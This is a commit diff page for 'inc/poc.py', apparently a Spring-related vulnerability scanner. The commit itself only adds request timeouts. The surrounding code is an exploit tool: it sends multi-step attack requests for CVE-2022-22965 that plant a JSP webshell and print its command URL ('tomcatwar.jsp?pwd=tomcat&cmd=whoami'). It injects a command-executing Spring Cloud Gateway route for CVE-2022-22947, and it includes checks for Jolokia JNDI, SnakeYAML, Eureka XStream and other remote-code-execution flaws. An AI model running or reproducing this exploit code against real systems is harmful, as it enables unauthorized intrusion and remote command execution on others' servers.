Skip to content

Commit 6c5878e

Browse files
authored
Update poc.py
1 parent c9b1733 commit 6c5878e

File tree

1 file changed

+30
-30
lines changed

1 file changed

+30
-30
lines changed

inc/poc.py

Lines changed: 30 additions & 30 deletions
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,7 @@
99
from time import sleep
1010
import urllib3
1111
urllib3.disable_warnings()
12-
requests.timeout = 10
12+
outtime = 10
1313

1414
ua = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36,Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
1515
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36,Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36",
@@ -36,13 +36,13 @@ def CVE_2022_22965(url, proxies):
3636
getpayload = url + payload_http
3737
try:
3838
requests.packages.urllib3.disable_warnings()
39-
requests.post(url, headers=Headers_1, data=data1, allow_redirects=False, verify=False, proxies=proxies)
39+
requests.post(url, headers=Headers_1, timeout = outtime, data=data1, allow_redirects=False, verify=False, proxies=proxies)
4040
sleep(0.5)
41-
requests.post(url, headers=Headers_1, data=data2, allow_redirects=False, verify=False, proxies=proxies)
41+
requests.post(url, headers=Headers_1, timeout = outtime, data=data2, allow_redirects=False, verify=False, proxies=proxies)
4242
sleep(0.5)
43-
requests.get(getpayload, headers=Headers_1, allow_redirects=False, verify=False, proxies=proxies)
43+
requests.get(getpayload, headers=Headers_1, timeout = outtime, allow_redirects=False, verify=False, proxies=proxies)
4444
sleep(0.5)
45-
test = requests.get(url + "tomcatwar.jsp", allow_redirects=False, verify=False, proxies=proxies)
45+
test = requests.get(url + "tomcatwar.jsp", timeout = outtime, allow_redirects=False, verify=False, proxies=proxies)
4646
if (test.status_code == 200):
4747
cprint("[+] [CVE-2022-22965] Webshell为:" + url + "tomcatwar.jsp?pwd=tomcat&cmd=whoami" ,"red")
4848
f2 = open("vulout.txt", "a")
@@ -76,7 +76,7 @@ def CVE_2022_22963(url, proxies):
7676
try:
7777
urltest = url + path
7878
requests.packages.urllib3.disable_warnings()
79-
req = requests.post(url=urltest, headers=header, data=data, verify=False, proxies=proxies)
79+
req = requests.post(url=urltest, headers=header, timeout = outtime, data=data, verify=False, proxies=proxies)
8080
code = req.status_code
8181
text = req.text
8282
rsp = '"error":"Internal Server Error"'
@@ -123,29 +123,29 @@ def CVE_2022_22947(url, proxies):
123123

124124
try:
125125
requests.packages.urllib3.disable_warnings()
126-
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload_linux, headers=headers1, json=json ,verify=False, proxies=proxies)
127-
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
128-
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
126+
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", timeout = outtime, data=payload_linux, headers=headers1, json=json ,verify=False, proxies=proxies)
127+
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout = outtime, verify=False, proxies=proxies)
128+
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout = outtime, verify=False, proxies=proxies)
129129
if ('uid=' in str(re3.text)) and ('gid=' in str(re3.text)) and ('groups=' in str(re3.text)):
130130
cprint(f'[+] [CVE-2022-22947] {url}', "red")
131131
f2 = open("vulout.txt", "a")
132132
f2.write("[+] [CVE-2022-22947] " + url + '\n')
133133
f2.close()
134134
else:
135-
re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
136-
re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
137-
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload_windows, headers=headers1, json=json ,verify=False, proxies=proxies)
138-
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
139-
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
135+
re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout = outtime, verify=False, proxies=proxies)
136+
re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout = outtime, verify=False, proxies=proxies)
137+
re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload_windows, headers=headers1, timeout = outtime, json=json ,verify=False, proxies=proxies)
138+
re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout = outtime, verify=False, proxies=proxies)
139+
re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout = outtime, verify=False, proxies=proxies)
140140
if ('<DIR>' in str(re3.text)):
141141
cprint(f'[+] [CVE-2022-22947] {url}', "red")
142142
f2 = open("vulout.txt", "a")
143143
f2.write("[+] [CVE-2022-22947] " + url + '\n')
144144
f2.close()
145145
else:
146146
cprint("[-] 目标 " + url + " 验证CVE-2022-22947漏洞不存在", "yellow")
147-
re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, verify=False, proxies=proxies)
148-
re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, verify=False, proxies=proxies)
147+
re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout = outtime, verify=False, proxies=proxies)
148+
re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout = outtime, verify=False, proxies=proxies)
149149
except KeyboardInterrupt:
150150
print("Ctrl + C 手动终止了进程")
151151
sys.exit()
@@ -171,7 +171,7 @@ def JeeSpring_2023(url,proxies):
171171

172172
try:
173173
requests.packages.urllib3.disable_warnings()
174-
re1 = requests.post(url=url + path, data=payload, headers=headers1, verify=False, proxies=proxies)
174+
re1 = requests.post(url=url + path, data=payload, headers=headers1, timeout = outtime, verify=False, proxies=proxies)
175175
code1 = re1.status_code
176176
if ('jsp' in str(re1.text)) and (int(code1) == 200):
177177
cprint(f'[+] [JeeSpring_2023] {url}', "red")
@@ -196,12 +196,12 @@ def JolokiaRCE(url,proxies):
196196

197197
try:
198198
requests.packages.urllib3.disable_warnings()
199-
re1 = requests.post(url=url + path1, allow_redirects=False, verify=False, proxies=proxies)
199+
re1 = requests.post(url=url + path1, timeout = outtime, allow_redirects=False, verify=False, proxies=proxies)
200200
code1 = re1.status_code
201-
re2 = requests.post(url=url + path2, allow_redirects=False, verify=False, proxies=proxies)
201+
re2 = requests.post(url=url + path2, timeout = outtime, allow_redirects=False, verify=False, proxies=proxies)
202202
code2 = re2.status_code
203203
if ((int(code1) == 200) or (int(code2) == 200)):
204-
retest = requests.get(url=url + path3, verify=False, proxies=proxies)
204+
retest = requests.get(url=url + path3, timeout = outtime, verify=False, proxies=proxies)
205205
code3 = retest.status_code
206206
if ('reloadByURL' in str(retest.text)) and (code3 == 200):
207207
cprint(f'[+] [Jolokia-Realm-JNDI-RCE-1] {url}', "red")
@@ -232,10 +232,10 @@ def CVE_2021_21234(url,proxies):
232232

233233
try:
234234
requests.packages.urllib3.disable_warnings()
235-
re1 = requests.post(url=url + payload1, verify=False, proxies=proxies)
236-
re2 = requests.post(url=url + payload2, verify=False, proxies=proxies)
237-
re3 = requests.post(url=url + payload3, verify=False, proxies=proxies)
238-
re4 = requests.post(url=url + payload4, verify=False, proxies=proxies)
235+
re1 = requests.post(url=url + payload1, timeout = outtime, verify=False, proxies=proxies)
236+
re2 = requests.post(url=url + payload2, timeout = outtime, verify=False, proxies=proxies)
237+
re3 = requests.post(url=url + payload3, timeout = outtime, verify=False, proxies=proxies)
238+
re4 = requests.post(url=url + payload4, timeout = outtime, verify=False, proxies=proxies)
239239
if (('MAPI' in str(re1.text)) or ('MAPI' in str(re2.text))):
240240
cprint(f'[+] [CVE-2021-21234-Win] {url}', "red")
241241
f2 = open("vulout.txt", "a")
@@ -273,8 +273,8 @@ def SnakeYAML_RCE(url,proxies):
273273
try:
274274
requests.packages.urllib3.disable_warnings()
275275
urltest = url + path
276-
re1 = requests.post(url=urltest, headers=Headers_1, data=payload_1, allow_redirects=False, verify=False, proxies=proxies)
277-
re2 = requests.post(url=urltest, headers=Headers_2, data=payload_2, allow_redirects=False, verify=False, proxies=proxies)
276+
re1 = requests.post(url=urltest, headers=Headers_1, timeout = outtime, data=payload_1, allow_redirects=False, verify=False, proxies=proxies)
277+
re2 = requests.post(url=urltest, headers=Headers_2, timeout = outtime, data=payload_2, allow_redirects=False, verify=False, proxies=proxies)
278278
if ('example.yml' in str(re1.text)):
279279
cprint(f'[+] [SnakeYAML_RCE-1] {url}', "red")
280280
f2 = open("vulout.txt", "a")
@@ -314,8 +314,8 @@ def Eureka_xstream_RCE(url,proxies):
314314
requests.packages.urllib3.disable_warnings()
315315
urltest1 = url + path1
316316
urltest2 = url + path2
317-
re1 = requests.post(url=urltest1, headers=Headers_1, data=payload_1, allow_redirects=False, verify=False, proxies=proxies)
318-
re2 = requests.post(url=urltest2, headers=Headers_2, data=payload_2, allow_redirects=False, verify=False, proxies=proxies)
317+
re1 = requests.post(url=urltest1, headers=Headers_1, timeout = outtime, data=payload_1, allow_redirects=False, verify=False, proxies=proxies)
318+
re2 = requests.post(url=urltest2, headers=Headers_2, timeout = outtime, data=payload_2, allow_redirects=False, verify=False, proxies=proxies)
319319
if ('127.0.0.2' in str(re1.text)):
320320
cprint(f'[+] [Eureka_Xstream-1] {url}', "red")
321321
f2 = open("vulout.txt", "a")
@@ -350,7 +350,7 @@ def CVE_2018_1273(url,proxies):
350350
requests.packages.urllib3.disable_warnings()
351351
urltest1 = url + path1
352352
urltest2 = url + path2
353-
re1 = requests.get(url=urltest1, headers=Headers, allow_redirects=False, verify=False, proxies=proxies)
353+
re1 = requests.get(url=urltest1, headers=Headers, timeout = outtime, allow_redirects=False, verify=False, proxies=proxies)
354354
code1 = re1.status_code
355355
if ((int(code1) == 200) and ('Users' in str(re1.text))):
356356
cprint(f'[+] [CVE-2018-1273] {url}', "red")
@@ -415,7 +415,7 @@ def poc(filename,proxies):
415415
url = url + "/"
416416
try:
417417
requests.packages.urllib3.disable_warnings()
418-
r = requests.get(url, verify=False, proxies=proxies)
418+
r = requests.get(url, timeout = outtime, verify=False, proxies=proxies)
419419
if r.status_code == 503:
420420
continue
421421
except KeyboardInterrupt:

0 commit comments

Comments
 (0)